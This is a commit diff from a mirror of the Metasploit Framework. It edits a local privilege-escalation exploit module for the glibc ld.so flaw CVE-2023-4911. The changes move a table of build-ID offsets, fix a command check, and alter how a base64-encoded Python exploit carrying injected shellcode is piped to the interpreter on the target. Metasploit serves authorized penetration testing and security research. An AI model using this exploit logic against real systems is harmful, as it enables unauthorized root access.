mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-10-02 07:40:19 +02:00
Responded to comments from jvoisin
This commit is contained in:
parent
96241f509a
commit
b86df4820c
@ -58,16 +58,7 @@ TARGETS = {
|
||||
}
|
||||
|
||||
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
|
||||
BUILD_IDS = {
|
||||
"69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
|
||||
"3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
|
||||
"a99db3715218b641780b04323e4ae5953d68a927": 561,
|
||||
"a8daca28288575ffc8c7641d40901b0148958fb1": 580,
|
||||
"61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
|
||||
"9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
|
||||
"e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
|
||||
"956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
|
||||
}
|
||||
BUILD_IDS = METASPLOIT_BUILD_IDS
|
||||
|
||||
libc = cdll.LoadLibrary("libc.so.6")
|
||||
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
|
||||
|
@ -18,8 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
include Msf::Exploit::FileDropper
|
||||
prepend Msf::Exploit::Remote::AutoCheck
|
||||
|
||||
BUILD_IDS = %w[69c048078b6c51fa8744f3d7cff3b0d9369ffd53 3602eac894717d56555552c84fc6b0e4d6a4af72 a99db3715218b641780b04323e4ae5953d68a927 a8daca28288575ffc8c7641d40901b0148958fb1 61ef896a699bb1c2e4e231642b2e1688b2f1a61e 9a9c6aeba5df4178de168e26fe30ddcdab47d374 e7b1e0ff3d359623538f4ae0ac69b3e8db26b674 956d98a11b839e3392fa1b367b1e3fdfc3e662f6]
|
||||
|
||||
BUILD_IDS = {'69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
|
||||
'3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
|
||||
'a99db3715218b641780b04323e4ae5953d68a927' => 561,
|
||||
'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
|
||||
'61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
|
||||
'9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
|
||||
'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
|
||||
'956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
|
||||
}
|
||||
def initialize(info = {})
|
||||
super(
|
||||
update_info(
|
||||
@ -71,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'DisclosureDate' => '2023-10-03',
|
||||
'Notes' => {
|
||||
'Stability' => [ CRASH_SAFE, ],
|
||||
'SideEffects' => [ ARTIFACTS_ON_DISK, ],
|
||||
'SideEffects' => [ ],
|
||||
'Reliability' => [ REPEATABLE_SESSION, ]
|
||||
}
|
||||
)
|
||||
@ -116,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
|
||||
def check_ld_so_build_id
|
||||
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
|
||||
if command_exists?('file ')
|
||||
if command_exists?('file')
|
||||
file_cmd_output = ''
|
||||
|
||||
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
|
||||
@ -128,14 +135,14 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
|
||||
end
|
||||
when 'debian'
|
||||
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
||||
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
||||
else
|
||||
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
|
||||
end
|
||||
|
||||
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
|
||||
build_id = Regexp.last_match(1)
|
||||
if BUILD_IDS.include?(build_id)
|
||||
if BUILD_IDS.keys.include?(build_id)
|
||||
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
|
||||
else
|
||||
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
|
||||
@ -154,16 +161,17 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
python_binary = find_exec_program
|
||||
fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary
|
||||
vprint_status("Using '#{python_binary}' to run the exploit")
|
||||
|
||||
|
||||
check_ld_so_build_id
|
||||
|
||||
# The python script assumes the working directory is the one we can write to.
|
||||
cd(datastore['WritableDir'])
|
||||
shell_code = payload.encoded.unpack('H*').first
|
||||
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code)
|
||||
|
||||
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code).gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))
|
||||
|
||||
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
|
||||
output = cmd_exec("$(echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary})")
|
||||
output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
|
||||
if output.blank?
|
||||
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
|
||||
else
|
||||
|
Loading…
Reference in New Issue
Block a user